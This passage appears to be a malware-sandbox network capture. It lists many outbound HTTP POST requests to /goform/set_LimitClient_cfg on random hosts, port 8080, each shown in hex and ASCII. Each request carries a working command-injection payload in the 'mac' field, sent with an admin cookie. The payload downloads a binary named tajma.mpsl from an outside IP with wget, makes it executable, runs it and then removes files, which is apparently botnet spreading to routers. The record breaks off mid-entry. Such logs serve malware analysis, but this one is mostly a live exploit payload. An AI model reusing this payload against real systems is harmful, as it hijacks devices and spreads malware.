                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2769192.168.2.2342012204.46.104.648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478243113 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2770192.168.2.234527861.230.60.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478255033 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2771192.168.2.235238240.120.201.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478261948 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2772192.168.2.2359532161.48.63.948080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478276014 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2773192.168.2.2335956126.17.250.2298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478507996 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2774192.168.2.2360700128.22.180.1128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478554010 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2775192.168.2.2355418104.249.137.1408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478573084 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2776192.168.2.2335258170.99.243.68080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478647947 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2777192.168.2.233819477.128.49.1678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478667021 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2778192.168.2.234643292.14.39.2248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478684902 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2779192.168.2.234425463.140.63.1048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478698969 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2780192.168.2.235544612.144.71.1778080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478722095 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2781192.168.2.2352174193.138.208.28080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478732109 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2782192.168.2.2336028205.213.16.2118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478749990 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2783192.168.2.2356502196.84.220.2438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478761911 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2784192.168.2.233697812.249.252.1448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478787899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2785192.168.2.2347696145.122.79.1168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478791952 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2786192.168.2.2351390119.154.100.978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478857994 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2787192.168.2.2358452199.65.190.58080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478857994 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2788192.168.2.234003219.43.241.1138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478880882 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2789192.168.2.2333942120.23.58.2288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.517514944 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2790192.168.2.235648487.196.140.928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.517689943 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2791192.168.2.2342594100.154.45.708080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.517694950 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
